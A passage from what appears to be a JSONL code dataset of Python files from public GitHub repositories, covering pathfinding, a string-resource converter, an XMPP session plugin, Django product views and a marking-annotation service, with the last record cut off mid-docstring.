current_node.obstacle:\n current_node = q.pop()\n for coords in current_node.neighbours(width, height):\n x, y = coords\n other_node = grid_nodes[y][x]\n if not other_node.obstacle:\n if not other_node.visited:\n other_node.visited = True\n distance = current_node.distance(other_node)\n if current_node.price + distance < other_node.price:\n other_node.enter(current_node)\n q.put(other_node)\n static_field = np.zeros(grid.shape)\n for x in range(width):\n for y in range(height):\n np_coords = (y, x)\n static_field[np_coords] = grid_nodes[y][x].price\n if normalize:\n return normalize_grid(static_field)\n return static_field\n","repo_name":"bumbac/MT","sub_path":"src/roommodel/utils/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33548440302","text":"seq=int(input())\nmr,mi=map(int,input().split())\nlst=[[i for i in input()] for i in range(seq)]\npr,pi=[i for i in range(seq) if \"p\" in lst[i]][0],[i.index(\"p\") for i in lst if \"p\" in i][0]\nif pr==mr:\n print(\"LEFT\" if pi<mi else \"RIGHT\")\n\nelse:\n def upanddown(lst,ups=[],):\n for i in lst:\n if \"m\" in i:m=i.index(\"m\");break\n ups.append(i)\n return ups,lst[[\"m\" in i for i in lst].index(True)+1:]\n up,down=upanddown(lst)\n ppos=lambda :\"DOWN\" if any([\"p\" in i for i in down]) else \"UP\" #if any([\"p\" in i for i in up]) else \"mid\"\n moves=[]\n [moves.append(ppos()) for i in range(abs(mr-pr))]\n [moves.append(\"LEFT\" if pi<mi else \"RIGHT\") for i in range(abs(mi-pi))]\n print(moves[0])","repo_name":"Ahmedabied/Practice_Solutions","sub_path":"Bot_saves_princess-2.py","file_name":"Bot_saves_princess-2.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73035539893","text":"import pytest\nfrom thefuck.rules.git_add_force import match, get_new_command\nfrom tests.utils import Command\n\n\n@pytest.fixture\ndef stderr():\n return ('The following paths are ignored by one of your .gitignore files:\\n'\n 'dist/app.js\\n'\n 'dist/background.js\\n'\n 'dist/options.js\\n'\n 'Use -f if you really want to add them.\\n')\n\n\ndef test_match(stderr):\n assert match(Command('git add dist/*.js', stderr=stderr))\n assert not match(Command('git add dist/*.js'))\n\n\ndef test_get_new_command(stderr):\n assert get_new_command(Command('git add dist/*.js', stderr=stderr)) \\\n == \"git add --force dist/*.js\"\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/nvbn_thefuck/thefuck-master/tests/rules/test_git_add_force.py","file_name":"test_git_add_force.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"4364533463","text":"# -*- coding: UTF-8 -*-\n#!/usr/bin/python3\n\"\"\"\nModel for CLDC task\n\"\"\"\n\n#************************************************************\n# Imported Libraries\n#************************************************************\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom xling_embedding_layer import XlingEmbeddingLayer\nfrom encoder import Encoder\nfrom inferer import Inferer\nfrom mlp.cldc_classifier import CLDCClassifier\nfrom xlingva import XlingVA\n\nimport pdb\n\n\nclass CLDCModel(nn.Module):\n def __init__(self, params, data_list, classifier_config, model_dict = None):\n super(CLDCModel, self).__init__()\n # embedding layer\n self.embeddings = XlingEmbeddingLayer(params, data_list)\n # encoder\n self.encoder = Encoder(params)\n # inferer\n self.inferer = Inferer(params, params.inf_in_dim)\n\n # load pretrained model\n if model_dict is not None:\n XlingVA.init_model(self, model_dict)\n \n # CLDC classifier \n self.cldc_classifier = CLDCClassifier(params, classifier_config)\n \n self.use_cuda = params.cuda\n if self.use_cuda:\n self.cuda()\n\n\n def get_gaus(self, lang, batch_in, batch_lens):\n # embedding\n input_word_embs = self.embeddings(lang, batch_in)\n # encoding\n hid = self.encoder(input_word_embs, batch_lens)\n # infering\n mu, logvar = self.inferer(hid)\n return mu, logvar\n\n\n def forward(self, lang, batch_in, batch_lens, batch_lb = None, vis = False):\n # embedding\n input_word_embs = self.embeddings(lang, batch_in)\n # encoding\n hid = self.encoder(input_word_embs, batch_lens)\n # infering\n mu, logvar = self.inferer(hid)\n z = self.inferer.reparameterize(mu, logvar)\n # classifier\n loss, pred_p, pred = self.cldc_classifier(z, batch_lb, self.training, vis=vis)\n #loss, pred_p, pred = self.cldc_classifier(hid, batch_lb, self.training, vis = vis)\n return loss, pred_p, pred\n","repo_name":"cambridgeltl/mling_sdgms","sub_path":"nn_model/cldc_model.py","file_name":"cldc_model.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"4167579731","text":"import csv\nimport json\nimport os\nimport re\nimport warnings\nfrom contextlib import redirect_stderr, redirect_stdout\nfrom pathlib import Path\nfrom typing import List\n\nimport gspread\nimport openpyxl\nimport yaml\nfrom arabic_reshaper import reshape\nfrom bidi.algorithm import get_display\nfrom console_style import ConsoleStyle\nfrom fpdf import FPDF\nfrom google.oauth2.credentials import Credentials\nfrom lingua import LanguageDetectorBuilder\n\n\ndef convert_strings(\n input_filepath: Path, output_filepath: Path, should_print_comments: bool\n):\n \"\"\"\n Extracts strings from the input file in either .xml or .strings format and converts\n them to the desired output file format. The output file format can be any of the\n following:\n\n - Android strings format (*.xml)\n - CSV\n - HTML\n - iOS strings format (*.strings)\n - JSON\n - MD\n - ODS\n - PDF\n - XLSX\n - YAML\n\n :param input_filepath: .strings or .xml file to extract the strings\n :type input_filepath: Path\n :param output_filepath: Name of the sheet to be generated\n :type output_filepath: Path\n :param should_print_comments: True if the user wants to print comments from\n .strings/.xml to the output file\n :type should_print_comments: bool\n \"\"\"\n\n strings = get_strings(input_filepath, should_print_comments)\n\n if output_filepath:\n conversion_functions = {\n \".csv\": to_csv,\n \".xlsx\": to_sheet,\n \".ods\": to_sheet,\n \".md\": to_md,\n \".json\": to_json,\n \".yaml\": to_yaml,\n \".html\": to_html,\n \".strings\": to_ios,\n \".xml\": to_android,\n \".pdf\": to_pdf,\n }\n\n if output_filepath.suffix in conversion_functions:\n conversion_functions[output_filepath.suffix](strings, output_filepath)\n\n print(\n f\"{ConsoleStyle.GREEN}Data successfully written to {output_filepath}\"\n f\"{ConsoleStyle.END}\"\n )\n else:\n raise ValueError(\n f\"{ConsoleStyle.YELLOW}File type not supported. Feel free to create \"\n f\"an issue here (https://github.com/HenestrosaConH/mobile-strings\"\n f\"-converter/issues) if you want the file type to be supported by the \"\n f\"package.{ConsoleStyle.END}\"\n )\n\n\ndef get_strings(input_filepath: Path, should_print_comments: bool):\n \"\"\"\n Creates a Google spreadsheet with the extracted strings from the input filepath\n\n :param input_filepath: .strings or .xml file to extract the strings\n :type input_filepath: Path\n :param should_print_comments: True if the user wants to print comments from\n .strings/.xml to the file\n :type should_print_comments: bool\n \"\"\"\n\n if input_filepath.suffix == \".strings\":\n if should_print_comments:\n pattern = r'\"(.*?)\"\\s*=\\s*\"((?:[^\"\\\\]|\\\\.)*)\"\\s*;'\n else:\n pattern = r'^(?!\\s*//)\\s*\"(.+?)\"\\s*=\\s*\"((?:[^\"\\\\]|\\\\.)*)\"\\s*;'\n elif input_filepath.suffix == \".xml\":\n if should_print_comments:\n pattern = r'<string name=\"(.*?)\">(.*?)</string>'\n else:\n pattern = r'^(?!\\s*<!--)\\s*<string name=\"(.*?)\">(.*?)</string>(?!\\s*-->)'\n else:\n raise ValueError(\n \"The extension of the provided file must be .strings for iOS or .xml \"\n \"Android\"\n )\n\n # Open the Localizable.strings file\n with open(input_filepath, \"r\", encoding=\"utf-8\") as file:\n strings_data = file.read()\n\n # Extract the strings using a regular expression\n strings = re.findall(pattern, strings_data, re.MULTILINE)\n\n if len(strings) >= 1:\n return strings\n else:\n raise ValueError(\n \"The file provided is not a valid Localizable.strings nor strings.xml file.\"\n )\n\n\ndef to_google_sheets(\n input_filepath: Path,\n sheet_name: str,\n credentials_filepath: Path,\n should_print_comments: bool,\n):\n \"\"\"\n Creates a Google spreadsheet with the extracted strings from the input filepath\n\n :param input_filepath: .strings or .xml file to extract the strings\n :type input_filepath: Path\n :param sheet_name: Name of the sheet to be generated\n :type sheet_name: str\n :param credentials_filepath: Path to the service_account.json in order to be able\n to create the sheet in the user's Google account\n :type credentials_filepath: Path\n :param should_print_comments: True if the user wants to print comments from\n .strings/.xml to the sheet\n :type should_print_comments: bool\n \"\"\"\n\n strings = get_strings(input_filepath, should_print_comments)\n\n # Authenticate with Google Sheets API\n scope = [\n \"https://spreadsheets.google.com/feeds\",\n \"https://www.googleapis.com/auth/drive\",\n ]\n credentials = Credentials.from_service_account_file(credentials_filepath, scope)\n client = gspread.authorize(credentials)\n\n # Open a new sheet or an existing one\n sheet = client.open(sheet_name).sheet1\n\n # Clear the existing data in the sheet\n sheet.clear()\n\n # Write the data to the sheet\n for string in strings:\n sheet.append_row(string)\n\n\ndef to_csv(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .csv file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n with open(output_filepath, \"w\", encoding=\"utf-8\", newline=\"\") as file:\n writer = csv.writer(file)\n\n # Write the header row\n header = [\"name\", \"value\"]\n writer.writerow(header)\n\n # Write the data to the file\n for name, value in strings:\n writer.writerow([name, value])\n\n\ndef to_sheet(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .xlsx / .ods file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Create a new workbook\n workbook = openpyxl.Workbook()\n\n # Create a new sheet\n sheet = workbook.active\n\n # Write the header row\n sheet.cell(row=1, column=1, value=\"NAME\")\n sheet.cell(row=1, column=2, value=\"VALUE\")\n\n # Write the data to the sheet\n for i, (name, value) in enumerate(strings, start=2):\n sheet.cell(row=i, column=1, value=name)\n sheet.cell(row=i, column=2, value=value)\n\n # Save the file\n workbook.save(output_filepath)\n\n\ndef to_json(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .json file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Create a list of dictionaries to store the data\n data_list = []\n for name, value in strings:\n data_list.append({\"name\": name, \"value\": value})\n\n # Write the data to the JSON file\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n json.dump(data_list, file, ensure_ascii=False, indent=2)\n\n\ndef to_yaml(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .yaml file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Convert the data to a dictionary\n strings_dict = {name: value for name, value in strings}\n\n # Write the data to the YAML file\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n yaml.dump(strings_dict, file, default_flow_style=False, allow_unicode=True)\n\n\ndef to_html(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .html file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Create an HTML file\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n file.write(\"<head>\\n\")\n file.write('\\t<meta charset=\"UTF-8\">\\n')\n file.write(\"</head>\\n\")\n file.write(\"<table>\\n\")\n file.write(\"\\t<thead>\\n\")\n file.write(\"\\t\\t<tr>\\n\")\n file.write(\"\\t\\t\\t<th>NAME</th>\\n\")\n file.write(\"\\t\\t\\t<th>VALUE</th>\\n\")\n file.write(\"\\t\\t</tr>\\n\")\n file.write(\"\\t</thead>\\n\")\n file.write(\"\\t<tbody>\\n\")\n\n # Write the data to the HTML file\n for name, value in strings:\n file.write(\"\\t\\t<tr>\\n\")\n file.write(f\"\\t\\t\\t<td>{name}</td>\\n\")\n file.write(f\"\\t\\t\\t<td>{value}</td>\\n\")\n file.write(\"\\t\\t</tr>\\n\")\n\n file.write(\"\\t</tbody>\\n\")\n file.write(\"</table>\\n\")\n\n\ndef to_ios(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .strings file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n for string in strings:\n file.write(f'\"{string[0]}\" = \"{string[1]}\";\\n')\n\n\ndef to_android(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .xml file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n file.write(\"<resources>\\n\")\n for string in strings:\n file.write(f'\\t<string name=\"{string[0]}\">{string[1]}</string>\\n')\n\n file.write(\"</resources>\")\n\n\ndef to_pdf(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .pdf file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Ignore the following warning when adding a font already added:\n # UserWarning: Core font or font already added 'dejavusanscondensed': doing nothing\n warnings.filterwarnings(\"ignore\", category=UserWarning)\n\n def add_font(font_name, size=12):\n root_dir = Path(__file__).parent\n pdf.add_font(fname=str(root_dir / f\"assets/fonts/{font_name}.ttf\"))\n pdf.set_font(font_name, size=size)\n\n # Create a new PDF file\n pdf = FPDF(orientation=\"P\", format=\"A4\")\n pdf.add_page()\n pdf.set_font(\"Arial\", \"B\", 12)\n\n # Cell properties\n c_width = 95\n c_height = 10\n\n # Add headers to table\n pdf.cell(c_width, c_height, \"NAME\", border=1)\n pdf.cell(c_width, c_height, \"VALUE\", border=1)\n pdf.ln()\n\n detector = (\n LanguageDetectorBuilder.from_all_languages()\n .with_preloaded_language_models()\n .build()\n )\n\n # Add table data\n # https://stackoverflow.com/questions/53526311/fpdf-multicell-same-height\n for i, string in enumerate(strings):\n x = pdf.get_x()\n y = pdf.get_y()\n\n max_height = 0\n cells_in_row = 2\n\n for j in range(cells_in_row):\n language_code = None\n try:\n if j % 2 == 0: # Prevents 'name' language detection\n add_font(\"DejaVuSansCondensed\")\n else:\n language_code = detector.detect_language_of(\n string[j]\n ).iso_code_639_1.name.lower()\n\n if language_code in [\n \"bn\", # Bengali\n \"hi\", # Hindi\n \"kn\", # Kannada\n \"ml\", # Malayalam\n \"mr\", # Marathi\n \"or\", # Oriya\n \"bo\", # Tibetan\n ]:\n add_font(\"gargi\")\n elif language_code == \"gu\": # Gujarati\n add_font(\"Aakar\")\n elif language_code == \"te\": # Telugu\n add_font(\"AnekTelugu-VariableFont_wdth,wght\")\n elif language_code == \"ta\": # Tamil\n add_font(\"latha\")\n elif language_code == \"pa\": # Punjabi, Panjabi\n add_font(\"Gurvetica_a8_Heavy\")\n elif language_code == \"zh\" or language_code == \"ja\":\n # Chinese or Japanese\n add_font(\"fireflysung\")\n elif language_code == \"ko\": # Korean\n add_font(\"Eunjin\")\n elif language_code == \"th\": # Thai\n add_font(\"Waree\")\n else:\n add_font(\"DejaVuSansCondensed\")\n\n if language_code in [\n # RTL languages\n \"ar\", # Arabic\n \"he\", # Hebrew\n \"dv\", # Dhivehi\n \"ku\", # Kurdish (sorani)\n \"ps\", # Pashto\n \"fa\", # Persian\n \"sd\", # Sindhi\n \"ur\", # Urdu\n \"ug\", # Uyghur\n \"yi\", # Yiddish\n ]:\n pdf.multi_cell(c_width, c_height, get_display(reshape(string[j])))\n else:\n pdf.multi_cell(c_width, c_height, string[j])\n\n if pdf.get_y() - y > max_height:\n max_height = pdf.get_y() - y\n\n pdf.set_xy(x + (c_width * (j + 1)), y)\n except (Exception,):\n with open(\n output_filepath.parent / f\"{output_filepath.stem}-errors.txt\",\n \"a\",\n encoding=\"utf-8\",\n ) as f:\n f.write(f\"{string[1]} not supported\\n\")\n\n for j in range(cells_in_row + 1):\n pdf.line(x + c_width * j, y, x + c_width * j, y + max_height)\n\n pdf.line(x, y, x + c_width * cells_in_row, y)\n pdf.line(x, y + max_height, x + c_width * cells_in_row, y + max_height)\n\n pdf.ln()\n\n if (\n i < len(strings) - 1\n and pdf.get_y() + (max_height * cells_in_row) > pdf.h - 10\n ):\n pdf.add_page()\n\n # Inside this context manager, all output to stdout and stderr will be suppressed\n # This is done because in Windows, the following exception is raised if the\n # strings.xml file contains unsupported characters:\n #\n # UnicodeEncodeError: 'charmap'\n # codec can't encode characters in position 0-9: character maps to <undefined>\n with open(os.devnull, \"w\") as devnull:\n with redirect_stdout(devnull), redirect_stderr(devnull):\n # Save the PDF file\n pdf.output(str(output_filepath))\n\n\ndef to_md(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .md file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n with open(output_filepath, \"w\", encoding=\"utf-8\") as f:\n # Write each string to the Markdown file in a table format\n f.write(\"| NAME | VALUE |\\n\")\n f.write(\"| ----------- | ----------- |\\n\")\n for name, translation in strings:\n f.write(f\"| {name} | {translation} |\\n\")\n","repo_name":"HenestrosaConH/mobile-strings-converter","sub_path":"src/mobile_strings_converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":15837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11621169016","text":"# pylint: disable-all # Pylint seems to crash when looking into praw.\n# mypy: ignore-errors\n# Mypy doesn't have praw stubs libraries.\nimport datetime\nfrom typing import Iterator, Optional\n\nimport praw\nfrom praw.models import Subreddit\n\nfrom src.config.config import CONFIG\n\n\nclass RedditClient:\n __DATA_FILE: str = \"kpopSubReddit.txt\"\n __LIMIT_NB_POSTS_RETRIEVED: Optional[int] = None\n\n def __init__(self):\n self.reddit = praw.Reddit(\n client_id=CONFIG.REDDIT_CLIENT_ID,\n client_secret=CONFIG.REDDIT_CLIENT_SECRET,\n user_agent=CONFIG.REDDIT_USER_AGENT,\n )\n\n def getPosts(self):\n subredditName: str = \"kpop\"\n subreddit: Subreddit = self.reddit.subreddit(subredditName)\n posts: Iterator = subreddit.new(limit=self.__LIMIT_NB_POSTS_RETRIEVED)\n\n with open(CONFIG.DATA_PATH + self.__DATA_FILE, mode=\"wb\") as file:\n for post in posts:\n if post.link_flair_text.upper() in CONFIG.REDDIT_FLAIR_TAGS:\n date = datetime.datetime.fromtimestamp(post.created).strftime(\n \"%Y/%m/%d\"\n )\n print(\n f\"{post.link_flair_text} {post.title} {post.shortlink} {date}.\"\n )\n file.write(\n f\"{post.link_flair_text} {post.title} {post.shortlink} {date}.\\n\".encode(\n \"utf-8\"\n )\n )\n","repo_name":"golem-ai/showcases","sub_path":"graphKpop/src/service/redditClient.py","file_name":"redditClient.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25805969235","text":"\nimport asyncio\nimport logging\n\nfrom slixmpp.stanza import Iq, StreamFeatures\nfrom slixmpp.xmlstream import register_stanza_plugin\nfrom slixmpp.plugins import BasePlugin\n\nfrom slixmpp.features.feature_session import stanza\nfrom typing import ClassVar, Set\n\n\nlog = logging.getLogger(__name__)\n\n\nclass FeatureSession(BasePlugin):\n\n name = 'feature_session'\n description = 'RFC 3920: Stream Feature: Start Session'\n dependencies: ClassVar[Set[str]] = set()\n stanza = stanza\n\n def plugin_init(self):\n self.xmpp.register_feature('session',\n self._handle_start_session,\n restart=False,\n order=10001)\n\n register_stanza_plugin(Iq, stanza.Session)\n register_stanza_plugin(StreamFeatures, stanza.Session)\n\n async def _handle_start_session(self, features):\n \"\"\"\n Handle the start of the session.\n\n Arguments:\n feature -- The stream features element.\n \"\"\"\n if features['session']['optional']:\n self.xmpp.sessionstarted = True\n self.xmpp.event('session_start')\n return\n\n iq = self.xmpp.Iq()\n iq['type'] = 'set'\n iq.enable('session')\n await iq.send(callback=self._on_start_session_response)\n\n def _on_start_session_response(self, response):\n self.xmpp.features.add('session')\n\n log.debug(\"Established Session\")\n self.xmpp.sessionstarted = True\n self.xmpp.event('session_start')\n","repo_name":"poezio/slixmpp","sub_path":"slixmpp/features/feature_session/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"21"} +{"seq_id":"5586310034","text":"import pandas as pd\nfrom selenium import webdriver\nimport json\nimport os\n\n# Global Variables \nPDF_savepath = './Downloads' # Edit here to change save directory\nwebdriver_path = './chromedriver' # Edit this to the chrome webdriver location. Visit https://chromedriver.chromium.org/downloads and https://www.google.com/chrome/ to download webdriver and chrome browser.\nreference = pd.read_csv('reference.csv') # List of pages to be archived\n\n# Download function\ndef download(url,name,PDF_savepath = PDF_savepath,webdriver_path = webdriver_path):\n '''\n Download the webpage and save as PDF to PDF_savepath.\n\n url: URL format string. The link to the page.\n name: String. Name of the downloaded file.\n PDF_savepath: Directory format string. Where to store the downloaded file. Default to be specified in Global Variables.\n webdriver_saverpath: Directory format string. Path to the webdriver. Default to be specified in Global Variables.\n '''\n # Specify download preferences\n chrome_options = webdriver.ChromeOptions()\n appState = {\n 'recentDestinations': [\n {\n 'id': 'Save as PDF',\n 'origin': 'local',\n 'account': ''\n }\n ],\n 'selectedDestinationId': 'Save as PDF',\n 'version': 2\n }\n prefs = {\n 'printing.print_preview_sticky_settings.appState': json.dumps(appState), \n 'savefile.default_directory': PDF_savepath,\n }\n chrome_options.add_experimental_option(\"prefs\", prefs)\n chrome_options.add_argument('--kiosk-printing')\n # chrome_options.add_argument('-headless') # I don't know why headless mode doesn't work...\n # Start running the browser\n driver = webdriver.Chrome(webdriver_path, options=chrome_options) \n driver.implicitly_wait(10)\n driver.get(url)\n driver.execute_script('window.print();')\n driver.close()\n # Rename\n os.chdir(PDF_savepath)\n files = filter(os.path.isfile, os.listdir(PDF_savepath))\n files = [os.path.join(PDF_savepath, f) for f in files]\n files.sort(key=lambda x: os.path.getmtime(x))\n newest_file = files[-1]\n os.rename(newest_file, name +\".pdf\")\n\n# Parse the list, feel free to modify to cope with desired category format\nfor i in range(len(reference)):\n url = reference.iloc[i]['url']\n name = reference.iloc[i]['name']\n download(url, name)\n print(name + ' downloaded')","repo_name":"pool-bear/webpage-to-pdf","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33093903020","text":"from django.http import JsonResponse\nfrom django.views import View\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator\nfrom django.core.exceptions import FieldError\n\nfrom products.models import FirstCategory, Product\n\nclass FirstCategoryView(View):\n def get(self, request):\n first_categories = FirstCategory.objects.all()\n\n results = [{\n 'first_category_id' : first_category.id,\n 'first_category_title': first_category.name,\n 'second_categories':[{\n 'second_category_id' : second_category.id,\n 'second_category_title': second_category.name\n }for second_category in first_category.secondcategory_set.all()]\n }for first_category in first_categories]\n\n return JsonResponse({'results': results}, status=200)\n\n\nclass ProductDetailView(View):\n def get(self, request, product_id):\n product = Product.objects\\\n .select_related(\"second_category__first_category\",\"brand\")\\\n .prefetch_related('productoption_set__size','productoption_set__color','additional_product','thumbnailimage_set')\\\n .get(id = product_id)\n\n result={\n 'product_id' : product.id,\n 'first_category' : [{\n 'first_category_id' : product.second_category.first_category.id,\n 'first_category_name': product.second_category.first_category.name\n }],\n 'second_category' : [{\n 'second_category_id' : product.second_category.id,\n 'second_category_name': product.second_category.name\n }],\n 'brand' : product.brand.name,\n 'title' : product.title,\n 'price' : product.price,\n 'thumbnail_images' : [thumbnailimage.url for thumbnailimage in product.thumbnailimage_set.all()],\n 'additional_products' : [additional_product.title for additional_product in product.additional_product.all()],\n 'product_options' : [{\n 'size_option' : productoption.size.name,\n 'color_option' : productoption.color.name,\n 'additional_price': productoption.additional_price\n }for productoption in product.productoption_set.all()]\n }\n\n return JsonResponse({'result': result }, status=200)\n\n\nclass ProductListView(View):\n def get(self, request):\n first_category_id = request.GET.get('first_category')\n second_category_id = request.GET.get('second_category')\n color = request.GET.get('color')\n size = request.GET.get('size')\n sort = request.GET.get('sort', 'id')\n limit = int(request.GET.get(\"limit\", 8))\n offset = int(request.GET.get(\"offset\", 1))\n\n product_Q = Q()\n\n if second_category_id:\n product_Q = Q(second_category = second_category_id)\n\n elif first_category_id:\n product_Q = Q(second_category__first_category_id = first_category_id)\n \n if color:\n product_Q &= Q(productoption__color__name=color)\n\n if size:\n product_Q &= Q(productoption__size__name=size)\n \n sort_menu={\n 'id' : 'id',\n 'high_price': '-price',\n 'low_price' : 'price',\n 'best' : 'productoption__stock'\n }\n\n if not sort in sort_menu:\n return JsonResponse({\"message\": \"SORT_INVALID_VALUE\"})\n \n products = Product.objects.filter(product_Q).order_by(sort_menu.get(sort))\\\n .select_related('second_category__first_category','brand')\n\n p = Paginator(products, limit)\n\n results = [{\n 'product_id' : product.id,\n 'title' : product.title,\n 'brand' : product.brand.name,\n 'price' : product.price,\n 'first_category_id' : product.second_category.first_category.id,\n 'second_category_id': product.second_category.id,\n 'main_image' : product.main_image,\n }for product in p.page(offset)]\n\n return JsonResponse({\"results\":results, \"exist_nest_page\":p.page(offset).has_next()},status = 200)\n","repo_name":"wecode-bootcamp-korea/35-2nd-nhouse-backend","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7996466472","text":"from datetime import timedelta\nfrom typing import Dict, Tuple, Union\n\nimport arrow\n\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import transaction\nfrom django.db.models.query import QuerySet\nfrom django.utils import timezone\n\nfrom Mark.models import Annotation, MarkingTask\nfrom Mark.services import MarkingTaskService\n\n\nclass UserInfoServices:\n \"\"\"Functions for User Info HTML page.\"\"\"\n\n @transaction.atomic\n def annotation_exists(self) -> bool:\n \"\"\"Return True if there are any annotations in the database.\n\n Returns:\n bool : True if there are annotations or\n False if there aren't any\n \"\"\"\n return Annotation.objects.exists()\n\n @transaction.atomic\n def get_total_annotations_count_based_on_user(self) -> Dict[str, int]:\n \"\"\"Retrieve annotations based on user.\n\n Returns:\n Dict[str, int]: A dictionary of all annotations(Value) corresponding with the markers(key).\n\n Raises:\n Not expected to raise any exceptions.\n \"\"\"\n annotations = (\n MarkingTaskService().get_latest_annotations_from_complete_marking_tasks()\n )\n markers_and_managers = User.objects.filter(\n groups__name__in=[\"marker\"]\n ).order_by(\"groups__name\", \"username\")\n annotation_count_dict: Dict[str, int] = {\n user.username: 0 for user in markers_and_managers\n }\n\n for annotation in annotations:\n if annotation.user.username in annotation_count_dict:\n annotation_count_dict[annotation.user.username] += 1\n\n return annotation_count_dict\n\n @transaction.atomic\n def get_annotations_based_on_user(\n self, annotations\n ) -> Dict[str, Dict[Tuple[int, int], Dict[str, Union[int, str]]]]:\n \"\"\"Retrieve annotations based on the combination of user, question number, and version.\n\n Returns a dictionary with users as keys and nested dictionaries as values.\n The nested dictionaries have a tuple (question_number, question_version) as keys\n and the count of annotations and average marking time as values.\n\n Returns:\n Dict[str, Dict[Tuple[int, int], Dict[str, Union(int, str)]]]: A dictionary with users\n as keys, and nested dictionaries as values containing the count of annotations\n and average marking time for each (question_number, question_version) combination.\n \"\"\"\n count_data: Dict[str, Dict[Tuple[int, int], int]] = dict()\n total_marking_time_data: Dict[str, Dict[Tuple[int, int], int]] = dict()\n\n for annotation in annotations:\n key = (annotation.task.question_number, annotation.task.question_version)\n count_data.setdefault(annotation.user.username, {}).setdefault(key, 0)\n count_data[annotation.user.username][key] += 1\n\n total_marking_time_data.setdefault(annotation.user.username, {}).setdefault(\n key, 0\n )\n total_marking_time_data[annotation.user.username][\n key\n ] += annotation.marking_time\n\n grouped_by_user: Dict[\n str, Dict[Tuple[int, int], Dict[str, Union[int, str]]]\n ] = dict()\n\n for user in count_data:\n grouped_by_user[user] = dict()\n for key in count_data[user]:\n count = count_data[user][key]\n total_marking_time = total_marking_time_data[user][key]\n\n if total_marking_time is None:\n total_marking_time = 0\n\n average_marking_time = round(\n total_marking_time / count if count > 0 else 0\n )\n\n grouped_by_user[user][key] = {\n \"annotations_count\": count,\n \"average_marking_time\": self.seconds_to_humanize_time(\n average_marking_time\n ),\n \"percentage_marked\": int(\n (\n count\n / self.get_marking_task_count_based_on_question_number_and_version(\n question=key[0], version=key[1]\n )\n )\n * 100\n ),\n \"date_format\": arrow.utcnow()\n .shift(seconds=average_marking_time)\n .format(\"YYYYMMDDHHmmss\"),\n }\n\n return grouped_by_user\n\n def get_annotations_based_on_question_number_version(\n self,\n grouped_by_user_annotations: Dict[\n str, Dict[Tuple[int, int], Dict[str, Union[int, str]]]\n ],\n ) -> Dict[Tuple[int, int], Dict[str, list]]:\n \"\"\"Group annotations by question number and version.\n\n Args:\n grouped_by_user_annotations: (Dict[str, Dict[Tuple[int, int], Dict[str, Union[int, str]]]])\n A dictionary with users as keys, and nested dictionaries as values containing the count\n of annotations and average marking time for each (question_number, question_version)\n combination.\n\n Returns:\n Dict[Tuple[int, int], Dict[str, list]]: A dictionary containing annotations grouped 